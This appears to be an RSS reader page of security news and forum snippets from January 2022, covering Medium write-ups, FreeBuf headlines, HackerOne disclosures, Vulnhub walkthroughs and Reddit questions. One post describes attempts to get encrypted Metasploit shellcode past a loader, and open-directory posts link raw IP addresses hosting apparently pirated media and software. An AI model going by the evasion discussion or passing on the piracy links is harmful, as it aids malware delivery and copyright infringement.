  • Open

    Advanced Searching with Google Dorking
    What is Google Dorking? Continue reading on Medium »  ( 2 min )
    Writeup_TryHackMe_Searchlight — IMINT
    As part of OSINT learning, I am working to complete all the Try_Hack_Me rooms which are linked to OSINT research. Continue reading on Medium »
  • Open

    Kerberos Authentication (again… but better)
    On of the most known authentication protocol in Windows environment is Kerberos (RFC 1510 for the V5). Continue reading on Medium »
    What is a red team
    In a red team/blue team cybersecurity simulation, the red team acts as an adversary, attempting to identify and exploit potential… Continue reading on Medium »  ( 3 min )
    CompTIA ITF+
    I was fortunate that the CompTIA ANZ Business Technology Community & Horden Technologies offered a free, entry-level qualification for… Continue reading on Medium »  ( 1 min )
  • Open

    An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278
    1.0 Introduction On Friday, December 10, 2021, Charlie Clark (@exploitph) published a blog post detailing the weaponization of CVEs 2021-42287 and 2021-42278. In the blog post, Charlie extensively covered the background of the vulnerabilities, how the vulnerabilities were weaponized into Rubeus, with help from Ceri Coburn (@_EthicalChaos_), the full ‘attack chain,’ mitigations, and some detections.... The post An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278 appeared first on TrustedSec.  ( 7 min )
  • Open

    APT新趋势:战略性休眠域名利用率提升,检测困难
    攻击者越来越倾向于提前注册域名备用,利用这类战略性休眠域名的攻击越来越多。  ( 1 min )
    红日安全靶场三
    目标是要拿到win2012域控服务器中的一份文件。  ( 1 min )
    私人订制,打造白帽子专用移动系统
    为了能够做好针对恶意样本的分析,本文分享一种新型思路——私人订制,打造白帽子专用移动系统!  ( 1 min )
    十大最常见的ATT&CK战术及技术
    Picus研究人员从各种来源收集了超过二十万真实世界威胁样本,确定了样本的战术、技术和程序(TTP),并对每个TTP进行了分类,所有样本超过180万种ATT&CK技术。  ( 1 min )
    FreeBuf 早报 | 诈骗者冒充经纪商骗取投资者5000万美元;购物和网贷诈骗最常见
    “电商刷单,让你在家动动手指就能赚钱”“跟着老师炒股赚大钱”……在网上,用户经常能从各类软件推送中收到类似的消息,这些诱人的“馅饼”背后,却是危险的“陷阱”。  ( 1 min )
    CISA《网络安全事件和漏洞响应手册》提到的SSVC是什么?
    作为一种新的漏洞评估方法,SSVC的特点主要体现为三个“面向”:面向供应链、面向决策结果、面向实践经验。  ( 1 min )
    密码套件:密码,算法和协商安全设置(一)
    但确实密码套件在我们通过Internet建立的每个HTTPS连接中都起着至关重要的作用。  ( 1 min )
    谷歌出手,5 亿美元“拿下”以色列网络安全公司 Siemplify
    路透社披露谷歌旗下云计算部门完成收购以色列网络安全公司Siemplify。  ( 1 min )
    探寻新能量,安全新未来 | 首届「网安新势力」 大会官网正式上线
    第一届「网安新势力」大会官网今天正式上线啦,还不赶紧报名!  ( 1 min )
    本田和讴歌汽车受千年虫影响,时钟倒退到2002年
    本田和讴歌是否真的会让车主等待7个月的时间才能修复这一漏洞吗?
    研究人员揭露了一个长期潜伏的金融盗窃团伙——Elephant Beetle
    该团伙以交易处理系统为目标,从拉美地区的金融实体中窃取资金至少长达4年。  ( 1 min )
    告别脚本小子系列丨JAVA安全(2)——JAVA反编译技巧
    告别脚本小子系列是本公众号新开的一个集代码审计、安全研究和漏洞复现的专题,意在帮助大家更深入的理解漏洞原理和掌握漏洞挖掘的思路和技巧。我们将由浅入深的对java安全相关的技术进行讲解。  ( 1 min )
    数据统计:网络安全事件造成影响及成本
    软件安全是网络安全的基础防线,这也提醒我们从软件开发开始就应重视代码安全建设,提高软件安全性。  ( 1 min )
    Git信息泄露原理解析及利用总结
    在配置不当的情况下,可能会将“.git”文件直接部署到线上环境,这就造成了git泄露问题。  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you my another writeup (wrote 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just publish a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    'DoorLock' Vulnerability Can Force iOS Devices to Endlessly Reboot
    Article URL: https://www.pcmag.com/news/doorlock-vulnerability-can-force-ios-devices-to-endlessly-reboot Comments URL: https://news.ycombinator.com/item?id=29819095 Points: 2 # Comments: 0  ( 5 min )

  • Open

    Vscode의 유용한 Extensions
    여러분들은 어떤 코드 에디터를 사용하시나요? 저는 학부생 시절부터 vim 유져었었고 이후 vim + geany, atom + vim 을 거쳐 이제 vscode와 vim을 동시에 사용하는 형태로 전환헀습니다. (말이 vim이지 사실 neovim을 써요 😅) 궁금해서 투표 올렸었는데, 예상보다 퍼센트가 훨씬 많이 차이가 났어요 (전 한 7/3 정도 생각했는데..) 어쨌던 vscode로 넘어오게 되면서 vscode의 extension을 찾아보게 됬었는데요, 여러개 설치해보면서 제가 괜찮다고 느꼈던 것들을 공유해볼까 합니다. Atom -> Vscode 저는 사실 Atom에 만족하고 잘 사용하던 유저였습니다.
  • Open

    Anyone use X1 to capture Facebook and are you having issues with it right now?
    Just wondering if it's just me. It's only capturing images on the first page, the rest are blank. I've tried 4 times today submitted by /u/ShadowsWandering [link] [comments]  ( 1 min )
    Automated approach to Memory Analysis
    Hello all, So we’re on a Project and being the sole one to do the task, I was wondering if there’s to some extent we can automate the Memory Analysis part! Currently, I do it using Volatility Framework! I came across Volatility Bot, but saw it was last pushed 5 years back, so step aside! Any leads could really help me in! Thanks submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    Investigating an employee
    Hello, Not sure if this is the correct location. If I'm to investigate an employee for not working during work hours, or someone with suspicious login activities, what common places will you be investigating? E.g. checking browser histories. Physical security (login/logout time) Docs created on DMS (files opened, accessed, etc. Recently printed docs? In other words, to know what a person is doing at work, what activities (or logs) should I be searching? submitted by /u/ram3nboy [link] [comments]  ( 1 min )
  • Open

    Staging Cobalt Strike with mTLS using Caddy — Improsec | improving security
    submitted by /u/dmchell [link] [comments]
    Can You Trust a File’s Digital Signature? New Zloader Campaign exploits Microsoft’s Signature Verification putting users at risk - Check Point Research
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Which protocols allow authentication with AD passwords?
    SMB - 445. WINRM - 5985/6. RDP - 3389. WMI - 135/9. RPC - 5001. Ldap - 389 What more? submitted by /u/henadar [link] [comments]
    Metasploit payloads dont work with custom loaders
    Hello, im taking a course by Sektor7. i have the problem that, no matter in which way i try, i cant get a metasploit payload executed correctly by any loader (cpp) in the course. The program run, but there was no meterpreter session opened no more What I tried: Simple xor encryption and decryption Simple AES encryption and decryption Even base64 encoding doesnt work for me I also tried to research the root of the problem with no success. The source I used already was fixed for all problems any debugger gave me: The python script for aes encryption: https://pastebin.com/Qyxa3Zrr The cpp loader that decrypts and runs the payload in memory: https://pastebin.com/MfVynd45 the compiler (a custom batch): https://pastebin.com/rn6zXfqi I already tried to generate a PE with msfvenom and run it through the python, did not work. I tried to generate the raw payload with msfvenom, then encrypt it manually and put in aes key and payload into the cpp, didnt work. I tried to generate with -f raw -o 1.bin, then run the .bin through the python, didnt work. Note: Only the provided shellcodes by Sektor7 seem to work flawlessly. These have no other function besides executing the calc.exe from the System32 folder or showing basic messages. Maybe the sheer size of metasploit generated payloads or its custom functions make them going broken during the cryption and compilation process? If yes, why and how to design the loaders they dont break the payload? submitted by /u/janameyers2002 [link] [comments]  ( 2 min )
  • Open

    Is to late to change path?
    Hi, I am a sysadmin from 8 years now i am thinking to change my career path in network & security. Because i see my colleagues in the security field and started to like more and more. So my question is where to start? submitted by /u/lisi_dx [link] [comments]  ( 1 min )
    Is there any valid reason to disallow special characters from a password?
    Was helping my partner’s parents set up a password manager and they found that their bank does not allow special characters in their password. None. To me this is a red flag that indicates they aren’t sanitizing their database inputs and could be vulnerable to SQL injection. But is that overly paranoid? Is there a legitimate reason to disallow special characters? (For the record I recommended they use a long passphrase) submitted by /u/furikakebabe [link] [comments]  ( 4 min )
    A random user on omegle said my name
    Honestly a lil freaked out rn cause a random user on omegle guessed my name within 10 seconds of getting matched there. He was like “i know everything about you” and i thought he was just trolling. But then dude proceeded to say my name.He got my age wrong. I got freaked out and immediately disconnected. I don’t know much about these things. Should i be worried? Am i hacked? submitted by /u/Indecisive-blahblah [link] [comments]  ( 3 min )
    Can anyone track a deleted gmail account?
    The police are already involved in this manner, and they’ve told me it’s okay to seek outside help from any individual or a cyber forensic PI company. At my job there’s an anonymous individual that’s been sending harmful misinformation about several of my colleagues. They made a Gmail account, sent emails out to many people, and deleted the account. These emails have ruined many lives. Unfortunately the police can’t do anything, but they said once we get a positive ID we can proceed with charging them with stalking, harassment, and defamation. Just to reiterate, law enforcement is involved, and they’ve given me permission to go this route in apprehending the suspect. Could anyone assist in helping me track down the user so that I may forward the information to the police? I’ll pay. submitted by /u/deathbygoat [link] [comments]  ( 6 min )
    Could malware listen for cryptocurrency mnemonics through our devices - and what is the likelihood?
    Cryptocurrencies are often secured by a "mnemonic" which is a list of words selected from a set of 2048 standard words. If this mnemonic is compromised, all the funds can be stolen. Hypothetically, malware could listen for these 2048 keywords through the microphones on our laptops and mobile phones. Upon detecting these keywords, it could send a recording to the hacker. I'm asking this because personally I was writing down my mnemonic and then realised I had spoken the words as I was writing. My phone and laptop were in my room with me. There is no way to change my mnemonic currently, so I am hoping it has not been compromised. Do you think this kind of hack is plausible, or likely, or is it a slim possibility? Please be honest. Thank you for your time. submitted by /u/netsec-microphone-Q [link] [comments]  ( 2 min )
    Which FW brand / model do you respect or even impress you?
    Hi, The background is that I recently found out that my old Mikrotik RB750GL at home went out of support over a year ago. Since I just botched the PAN PA-200 I got for free from a friend it hit me: I have no idea what brands to avoid and what brands have a sound strategy and nice customer support for non enterprise customers. While I appreciate model recommendations my curiousity is more about a discussion about brands / models that are positioned for non commercial envirnment and the power user market... the why and why nots. Is there some functionality that you are surprised still isn't implemented in FWs far below the enterpris market? Is there a brand that you will do almost anything to avoid? Is there model that should be crowned as the Bernie Madoff of firewalls? I am thinking about SOHO applicance box that Is below / around $200 Is not "compile OpenBSD on it and use VI to...." as close to set and forget as you dare Handles at least 100Mbps internet connectivity (and gigabit routing on the internal net if there's multiple ports) Netflix, Gmail etc etc needs to work without configuring every client Deal with 2-4 users that thinks "port" has something to do with ships VLAN capability Simple to use VPN like Wireguard Smart addon services that might be on a yearly / monthly basis that really is worth it? submitted by /u/mindlight [link] [comments]  ( 4 min )
    What is a good CVE/Vuln MANAGEMENT Tool?
    I have put MANAGEMENT in caps for a reason. We already have some scanners (a couple of big names) but nothing to really help MANAGE the vulns. ​ Ideally things I'd like to be able to do: Have workflows based on CVSS eg scores of 7 and greater must be reviewed by X CVE comments Adjusted CVSS for local env mark/detect affected products/components jira integration Ingestion from qualys/other scanners etc Integration with threat intel Sort of like a CVE/vuln/risk specific ticketing system? ​ At the moment we have things in a few different systems/spreadsheets and it's making things a little tough to manage, I'd really like to be able to pull everything together to be able to manage things properly. Should ideally be scanner agnostic. submitted by /u/paracausalhorse [link] [comments]  ( 4 min )
  • Open

    PPTShots - Unintentionally shared data in PowerPoint presentations
    submitted by /u/df_works [link] [comments]  ( 1 min )
    We desperately need a way to rapidly notify people of high-impact vulnerabilities, so I built one
    submitted by /u/sullivanmatt [link] [comments]  ( 5 min )
  • Open

    Subdomain takeover of images.crossinstall.com
    Twitter disclosed a bug submitted by ian: https://hackerone.com/reports/1406335
    ABLE TO TRICK THE VICTIM INTO USING A CRAFTED EMAIL ADDRESS FOR A PARTICULAR SESSION AND THEN LATER TAKE BACK THE ACCOUNT
    Mattermost disclosed a bug submitted by at11zt00: https://hackerone.com/reports/1357013 - Bounty: $150
    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
    8x8 disclosed a bug submitted by n1had: https://hackerone.com/reports/1440161
  • Open

    Using Recon-Ng for Recon for Bug Bounty
    Recon-Ng is a great tool for automating your recon workflow and is one of the must have tool for Bug bounties Continue reading on Medium »  ( 1 min )
    How I was able to spoof any Instagram username on Instagram shop
    Summary: i discovered that i can spoof any Instagram username on Instagram shop, with this bug scammers can trick people into thinking… Continue reading on Medium »  ( 1 min )
    Why we use Nmap?
    I clear this topic in 2 points 1.As a hacking or penteration testing. 2.use in bug bounty. 1. As a Hacker- We know that nmap is network… Continue reading on Medium »  ( 1 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God. Continue reading on InfoSec Write-ups »  ( 4 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below: Continue reading on InfoSec Write-ups »
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    My new discoveries....
    http://www4.co.black-hawk.ia.us/engineer/ - Road Establishment Records, County Aerials, Road Establishment Records https://www.ndbc.noaa.gov/data/ - So much data! http://167.114.174.132:9092/ - Movies, Series, Music, etc http://162.12.215.254/ - Movies, Android Apps and Games, Software, Tv Series submitted by /u/ManaHoney504 [link] [comments]  ( 1 min )
    Archive.org (9th Time, Jim!)
    Is not an open directory. C’mon, mods, help us out here? edit/ apparently archive.org is technically an open directory. Thanks mod for addressing this and making the community an even better place for us pirates. Rrrrrrrr, matey. edit2/ PEACE AND LOVE, this is not a post directed to anyone in specific. PEACE AND LOVE. submitted by /u/martusfine [link] [comments]  ( 2 min )
    lots of books
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Is there a better alternative for Mega and Google Drive?
    Please recommend a file sharing service that is better than the two aformentioned. I am uploading books and PDFs concerning translations and machine learning. Something quite unknown to most and not too hassle. Not to keen on bans and removals submitted by /u/Burlack [link] [comments]  ( 2 min )
  • Open

    Fuzzing and exploiting map parser in Teeworlds
    submitted by /u/mmmds [link] [comments]
  • Open

    Beyond the Borrow Checker: Differential Fuzzing
    Article URL: https://tiemoko.com/blog/diff-fuzz/ Comments URL: https://news.ycombinator.com/item?id=29811302 Points: 2 # Comments: 0  ( 14 min )
  • Open

    SecWiki News 2022-01-05 Review
    聚焦算法推荐乱象问题 构建算法安全治理体系 by ourren 好的工作想法从哪里来 by ourren 开源情报及其在下一代网络安全中的应用---文献综述 by ourren 商品图谱构建与实体对齐 by ourren 网络爬虫公司可能触犯哪些罪名 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-05 Review
    聚焦算法推荐乱象问题 构建算法安全治理体系 by ourren 好的工作想法从哪里来 by ourren 开源情报及其在下一代网络安全中的应用---文献综述 by ourren 商品图谱构建与实体对齐 by ourren 网络爬虫公司可能触犯哪些罪名 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    KNOW YOUR PUBLIC PRESENCE ONLINE
    Day in and day out people sign up for services and fast forward loose tracks of these services because they don’t use them. It will be… Continue reading on Medium »  ( 2 min )
    The OSINT-ification of ISIS on the Dark Web
    *Note: This article was originally published by the author on March 11, 2019. Continue reading on Medium »  ( 11 min )
  • Open

    浅析利用进程实现文件控制
    在《关于进程创建分析》一文中,对一些linux命令以及进程创建、进程状态做了讲解,还做了几个小lab。在本篇文章中,将继续延续上篇文章的知识,讲解一些文件操作指令并做一些小lab。  ( 1 min )
    国家网信办拟修订《移动互联网应用程序信息服务管理规定》
    2022年1月5日,国家互联网信息办公室对2016年8月1日正式施行的《移动互联网应用程序信息服务管理规定》进行了修订。
    FreeBuf 早报 | DatPiff 数据泄露影响数百万人;提高反诈意识,别让共享屏幕骗局得手
    国家互联网信息办公室拟对已施行的《移动互联网应用程序信息服务管理规定》进行了修订,现向社会公开征求意见。  ( 1 min )
    恶意软件Purple Fox 伪装成 Telegram 安装程序传播
    与其他恶意软件的传播方式不同,Purple Fox采用的新传播方式,使得其隐匿性进一步提高。  ( 1 min )
    盘点 2021 年严重的网络攻击事件
    盘点一下2021年全球部分实体遭受的网络攻击事件。  ( 1 min )
    你在看视频,黑客在窃取你的信用卡信息
    在此次供应链攻击事件中,Unit42安全团队总共发现了 100 多个受此攻击活动影响的房地产网站,这意味着攻击非常成功。  ( 1 min )
    美国无线运营商 UScellular批露了发生在年末的数据泄露事件
    美国最大的无线运营商之一——UScellular披露了一起发生在去年12月份的数据泄露事件。
  • Open

    FTC warns companies to remediate Log4j security vulnerability
    Article URL: https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=29806997 Points: 2 # Comments: 1  ( 5 min )

  • Open

    How to change my public ip manually
    I already checked that my ip is dynamic but it seems to change every long time, does anyone know how to make it change manually? I have already spent about 1 month and tried restarting the router but it did not work submitted by /u/Shark233F [link] [comments]  ( 1 min )
    Was I DDOS attacked?
    I was browsing the PHP files on a website and kept getting remote force disconnected, and after reconnecting a few times suddenly nothing would load, not even other sites like Google. Switching over to a different network and going back to the site, it worked fine. Can't confirm but it also looked like the load on the entire previous network went up. The acronyms start to run together with trying to differentiate DOS, DDOS, and DNS, DNS Flood, Ipv4, IPv6, and DDNS, so I'm wondering if this was a DDOS attack on my specific DNS. Did they try to flood the IP with traffic to stop connectivity to the internet, or was something else going on? The website was public and anyone could see the stuff, but they must have been monitoring the traffic somehow and decided to disconnect what I was looking at, but after changing over networks everything was still up in the exact same place. The network I was on was probably bigger than theirs, being some random site, and it didn't look like they brought down the whole network, so it's strange that even other sites wouldn't load. I ran a WHOIS on the site and it turned out to be some Namecheap domain running on Cloudfare server registered under a fake address, and's only been up for about 14 months. submitted by /u/NoFilterr [link] [comments]  ( 1 min )
    State-of-the-art models or techniques applies to InfoSec?
    Hello, I'd like to know about some good and innovative practices that you can't find in standard guidelines like the ISO 27001 for example. The thing is, my company is stuck in the early 2000s with a Zero Trust policy for everything(which can be bypassed easily) and this is just a pain in the ass, no efficient at all considering it just makes workers being 100% dependent to IT for any requeriment So I want to ask for your advice submitted by /u/Key-Clothes-152 [link] [comments]  ( 1 min )
    Zscaler's Cloud Workload Communications protection
    Happy new Year everyone, Wonder if anyone had any experience with this so far? https://www.zscaler.com/press/zscaler-extends-its-proven-zero-trust-exchange-platform-deliver-zero-trust-workloads submitted by /u/killb0p [link] [comments]
    We all love MFA - is it a good idea to keep Google Authenticator addon in Chrome / Web Browser?
    I'm always thinking twice before installing any addon in my web browser. Very often removed it after I used it. However, there are addons designed to stay for longer. Like, google authenticator addon and alike. Q: For sake of security, is it a good idea to keep Google Authenticator addon in chrome or just forget about it and stick to the smartphone / pass-manager? submitted by /u/bitsailor [link] [comments]  ( 2 min )
    Proxy scanning(xpost r/hacking)
    so i just started looking into 0.0.0.0/0 scanning and it has shown a lot of potential so far with application like zmap and zgrab, had a lot of fun joining random minecraft server, but i would like to explore a more practical, usefull you might say, approach. when i think of scanning the internet other than vulnerable DNS servers, i think about those looooong ass free proxy lists sitting there in the open. I know, i know those are not anonymous, but i was wondering, how the duck do they get those lists, they are obviously not their servers, and to add to that proxies often have random ports, how do you scan for a service that has random ports, even then if you find a server with a port 80 or 8080 it could just be an http server out there, how do you identify it is an actual proxy, banner perhaps? ps: pls do not point out proprietary software or any if you can, i'm trying to learn here (TL;DR) i want a proxy list, made by me, and im struggling, pls help submitted by /u/filippobob [link] [comments]  ( 1 min )
    Suricata: anomaly-based detection?
    i tried Googling this, but am getting mixed messaging. It's signature based, but can detect anomalies? submitted by /u/albertcuy [link] [comments]  ( 1 min )
    tcpdump: how to keep packets that contain a substring only
    I have the following tcpdump command: sudo tcpdump -i eth0 -nn -A -s 65535 -w somepackets2.cap "(port not 443) && (less 15) && (tcp) && (greater 30)", but I want to add on another "and" condition that keeps only packets that contain "mysubstring". How can I do that? submitted by /u/social-bleach [link] [comments]  ( 1 min )
    Phishing email sent from own mail? Email spoofed or hacked?
    So, I received one those threat emails where they say my device is compromised, and the sender is myself. Phone is fine, no signs of viruses, I'm careful as well, have Adblock, have HTTPS everywhere. Google lists no suspicious activity, no traces that my mail was hacked. I changed passwords anyway, but can't help but be paranoid. I know it's possible to spoof an email address, and Google itself says the sender may not be the address shown. I was trying to see the original header with the help of a howtogeek guide, but there's no email address other than my own. Mail says it's a zero click vulnerability, that I was hacked through a website, but it all seems very unlikely. Can anyone please elaborate on this? My mail was not hacked? I'm not on have I been pwned, which is why I was extra concerned: how the heck do they have my email? submitted by /u/Unluckyclover_ [link] [comments]  ( 1 min )
    Do integer overflows also buffer overflow?
    Hi, I'm currently learning about c and the classic vulnerabilities that arise. Right now buffer overflows ​ So, just to sum up my understanding, an example like this will overflow because 'ab' is of two bytes is too big to store in the last byte of "buff": char buff[10]; buff[9] = 'ab'; The wiki article about buffer overflows define them as follows: "while writing data) to a buffer, overruns the buffer's boundary" This got me thinking that this sounds a lot like integer overflows. Trying to put something into a container that it cannot contain. But let's take the following example of a integer overflow (I use unsigned char for having most simple case): unsigned char c = 255; unsigned char cc = c + 1; Ok, so the single byte of the char cannot contain a value higher than 255, and thus it does modulo. And my understanding of integer overflow is that internally, the computer tries to put a 1 to the left of the current numbe, such that if 255 looks like this: 11111111 then it simply assumes that there exists a place that represents 256, and tries to create this binary number: 100000000 But there is no such bit, and therefore the number just becomes 00000000. But the single 1 that is lost doesnt that go somewhere in memory? For that reason, my thought was that integer overflows had have to also contain buffer overflows. Is this true? ​ Further thoughts At the core of the issue is a question of what actually constitutes a buffer in c. You could maybe argue that this problem would have been better suited for r/learnprogramming. But yeah, my guess is that it depends on whether or not a certain variable counts as buffers. is a int a buffer? is a char[]? etc? submitted by /u/GarseBo [link] [comments]  ( 2 min )
    What position would be most qualified for hacking?
    From reading this I'm thinking Security Analyst would be closest https://www.cs.seas.gwu.edu/cybersecurity-roles-and-job-titles submitted by /u/cookred [link] [comments]
  • Open

    The Story Of How I Bypass MAC Filter
    Hello everyone, Continue reading on Medium »  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux Continue reading on InfoSec Write-ups »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on System Weakness »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on Medium »  ( 2 min )
    How to freely borrow all the TVL from the Jet Protocol
    Recently I discovered a critical vulnerability that could possibly lead to the loss of funds in the smart contract of Jet Protocol, a… Continue reading on Medium »  ( 3 min )
    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
    SQL Injection - The File Upload Playground
    Summary : Continue reading on Medium »  ( 3 min )
    Spotlight: Earn Bitcoin While Browsing The Web On Desktop And Mobile
    Is it too good to be true? Well, join me on my quest to find out. Continue reading on Medium »
  • Open

    British Tv-Episodes of The Avengers, Bergerac, TOTP, The Professionals, Coronation Street, Dr Who. (1 seri Doomwatch, Dr Who (inferno)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Dr who literature
    submitted by /u/International_Milk_1 [link] [comments]
    Channel for old british tv stuff, mostly it would seem for kids. eg Paddinngton bear, but also dads army, one foot in the grave, etc etc.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    I have hundreds of *credible* books on corruption, parapolitics, economic warfare, propaganda, and state crimes. I’d like to share them but they are on an iCloud folder and too large to download. Is there anyway to transfer directly to Mega, please?
    submitted by /u/Few_Tumbleweed7151 [link] [comments]  ( 2 min )
    Smallish list of mostly Japanese movie and tv stuff. Some raw, some with english subs, some english dubs.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    FTP: Misc IBM software, marketing & training materials, annual reports, etc from 1994 to present
    submitted by /u/xuvatilavv [link] [comments]
    BSG Battlestar Galactica 720p Complete 2003-2012 Extras Subs
    http://37.187.18.191/tv/BSG%20Battlestar%20Galactica%20720p%20Complete%202003-2012%20Extras%20Subs/ submitted by /u/SeniorAlbatross [link] [comments]
    Anime Fansubs
    submitted by /u/International_Milk_1 [link] [comments]
    David Bowie Bootlegs
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    OPEN REDIRECT
    Nutanix disclosed a bug submitted by kauenavarro: https://hackerone.com/reports/1369806
    Buffer overflow in req_parsebody method in lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1434056 - Bounty: $2000
    %0A (New line) and limitness URL leads to DoS at all system [Main adress (https://www.acronis.com/)]
    Acronis disclosed a bug submitted by plantos: https://hackerone.com/reports/1382448
  • Open

    Sears Garage Door Signal Reverse Engineering
    submitted by /u/mdulin2 [link] [comments]  ( 1 min )
    Domain Persistence - AdminSDHolder
    submitted by /u/netbiosX [link] [comments]
    Cache Poisoning at Scale
    submitted by /u/albinowax [link] [comments]
  • Open

    SecWiki News 2022-01-04 Review
    CodeAnalysis: 腾讯 Static Code Analysis by ourren 网络安全标准实践指南——网络数据分类分级指引 by ourren 扛住100亿次红包请求的后端架构设计 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-04 Review
    CodeAnalysis: 腾讯 Static Code Analysis by ourren 网络安全标准实践指南——网络数据分类分级指引 by ourren 扛住100亿次红包请求的后端架构设计 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Top books to learn Android Hacking & Security
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    《网络安全审查办法》17项要点速读
    《网络安全审查办法》发布,这些要点请尽快了解。  ( 1 min )
    FreeBuf 早报 | 葡萄牙最大媒体集团遭勒索攻击;以色列媒体在苏莱曼尼遇害纪念日遭攻击
    全球动态1.以色列媒体在苏莱曼尼遇害周年纪念日遭到黑客攻击在伊朗伊斯兰革命卫队指挥官苏莱曼尼遇害周年纪念日,威胁行为者入侵了以色列媒体《耶路撒冷邮报》英文网站和《晚祷报》 (Maariv)的推特帐户。 [外刊-阅读原文]2.希腊黑客“攻陷”NASA局长社交账号美国宇航局(NASA)局长 Parimal Kopardekar 个人 Twitter 账户遭遇希腊黑客入侵。黑客组织的一位发言人称,此次把  ( 1 min )
    专访默安科技云舒:将安全融入开发,如春雨润物细无声
    云舒,默安科技联合创始人、CTO,16年以上安全从业经验、行业大V,欺骗防御理念的重要布道者。  ( 1 min )
    2021年最值得关注的五大安全话题:你关心的均有上榜
